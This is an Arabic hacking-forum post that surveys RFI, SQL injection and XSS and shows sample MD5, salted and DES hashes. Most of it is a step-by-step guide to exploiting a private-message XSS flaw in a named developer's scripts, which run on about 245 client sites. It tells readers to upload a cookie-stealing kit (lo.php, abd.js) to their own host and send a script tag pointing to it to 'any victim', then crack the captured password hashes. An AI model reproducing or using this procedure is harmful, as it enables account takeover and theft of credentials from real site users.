منتديات ايجي هاك سكول

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا
ادارة المنتدي

برامج هكر / برامج نت / افلام / العاب / برامج مج33 ونيم بظ


    مقدمة عن أخطر ثلاث ثغرات في العالم+ثغرة Xss تستخدم لسرقت الكوكيز(ثغره خطيره تعال شوف)

    شاطر

    KING OF HACKER
    رئيس ومؤسس المنتدي
    رئيس ومؤسس المنتدي

    عدد المساهمات : 130
    تاريخ التسجيل : 21/08/2010

    مقدمة عن أخطر ثلاث ثغرات في العالم+ثغرة Xss تستخدم لسرقت الكوكيز(ثغره خطيره تعال شوف)

    مُساهمة  KING OF HACKER في الأحد أغسطس 29, 2010 3:39 pm


    اليوم سوف أعرض عليكم ثغره حصرية لم تكتشف بعد من قبل اي شخص

    قبل لا أبدء بالتفاصيل بعطيكم موجز عن هذه أخطر ثلاث ثغرات ووأخطر ثلاث تشفيرات
    نبداء بالثغرات من الأقوى إلى الأضعف

    ثغرة Remote File Inclusion
    وهي من أقوى الثغرات وأسرعها إختراقاً للموقع .. ممممم ... ليس الموقع فقط بل جميع مواقع يلي على السيرفر مممم بل السيرفر بالكامل أيضاً يخترق بواسطة هذه الثغره

    ثغرة SQL Injection
    يعد من أخطر الثغرات وحتى المواقع العالمية مصابه بها
    وموقع yahoo يلي ترتيبه 1 عالمي مصاب بها
    وظيفة الثغره إستعلام في قواعد البيانات.. مثال: هذا المنتدى
    يمكنني أن ستعرض إسم المستخد + الباسورد + السالت + البريد للمدير أو العضو عن طريق هذه الثغره .. ويوجد أشياء أخرى يمكن أن تستغلها من الثغره كقرائه الملفات على الموقع وتعديل الملفات .. وكأنك على ثغره Remote File Inclusion ولكن ليست على كل الثغره تعمل على حسب الثغره

    ثغره XSS
    وهي ثغره مهمه جداً وخطيره بمعنى الكلمة
    وهي تقوم بسرقة الكوكيز الخاص بالشخص المرسل له
    والكوكيز تحتوي على الباسورد مشفر بتشفير MD5 سواء كان لمدير أو عضو على حسب نوع ثغره XSS

    مثال على التشفير MD5
    هذا إسمي قبلي التشفير
    Mr.Dangers
    بعد التشفير MD5
    429079908d45038d242f59dddcd41845

    لاحظ بأنه بعد التشفير صار عدد احروف والأرقام بالضبط 32 حرف ورقم

    سوف تلاحظون في شرحي بأني سوف أخذ الكوكيز + أفك تشفير الباسورد

    وهذه أخطر ثلاث تشفيرات
    وسوف نشفر إسم
    M.Dangers
    MD5 تشفير مشهور جداً وسهل فكه

    شكل التشفير 429079908d45038d242f59dddcd41845
    MD5+SALT تستخدم في المنتديات vBulletin ... وللعلم هذا المنتدى هو vBulletin 3.6.7 PL1
    شكل التشفير
    MD5
    5ed29c1cbe9fe89a790a7b6ffca3eee8
    SALT
    5-%

    DES وهو تشفير الباسورد للوحة التحكم للموقع أي CPANEL وأيضاً سهل فك تشفيره
    شكل التشفير
    .-33UTqNQyfcM
    ولو أقعد أتكلم عن التشفير لازم تجيبون قهوه وشاي<<<أقول طييييير .. خليك على الأندومي

    واليوم سوف أبداء من أضعف ثغره
    مكتشف الثغره Mr.Dangers
    بريد العضو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    تاريخ الإكتشاف
    هجري 29-10-1428
    ميلادي 10-11-2007
    المبرمج للسكربت المصاب
    اللوماني
    موقع اللوماني
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وقد تم تدمير ملفات موقعه سابقاً
    شاهدوا الصورة ^_^
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وظيفة الثغره
    إختراق الأعضاء عن طريق ثغرة بالرسائل الخاصه

    تعرفون مين هذا المبرمج
    هذا يلي برمجة سكربتات الأغاني والأفلام والبلوتوث
    تعروف موقع شبكة أوز للأغاني ترتيبه في أليكسا 500 يعني عالمي

    عدد عملائه أكثر من 200 عميل .. وأتوقع إنه صار أكثر 300 ولكن شاهدوا معي
    رابط لمشاهده العملاء ..
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    عدد المواقع : 245
    ملاحظة:: لم يضع جميع العملاء

    نبداء الشرح
    أولا أدخل لأحد عملائه وليكن
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    الأن سوف نسجل في الموقع
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وبعد التسجيل

    تصلك راسله تفعيل الإشتراك الأن فعل إشتراكك من البريد

    وبعدين أدخل هنا لملفك الشخص
    وهذا رابطه
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    وبعدها تابع الشرح بالفيديو

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    الأدوات المستخدمه لجلب الباسورد على الإيميل
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    والشكر موصول لمستر جوكر على توفيره للأدوات
    ملاحظة الإستخدام
    أفتح ملف lo.php بإستخدام برنامج المفكره
    وراح تلقى المطلوب تغييره داخل الملف
    غير البريد الموجود إلى بريدك
    ثم أرفع الملف مع الملف الثاني abd.js إلى موقعك المجاني أو المدفوع
    وأخيراً هذا الكود
    ****** src=http://XXXXXX/abd.js></******>
    ضع مكان مسار abd.js الموجود في موقعك

    وأرسل هذا الكود لأي ضحيه وبإذن الله تصلك رساله فوريه على البريد


    برنامج فك التشفير المستخدم في الشرح
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


    والقادم أقوى

    والحقوق محفوظة لمنظمة المسلمين

    وأي إستفسار ... جهازين للرد

    أخوكم في الله
    KING OF HACKER

    cheers

      الوقت/التاريخ الآن هو السبت ديسمبر 10, 2016 3:21 pm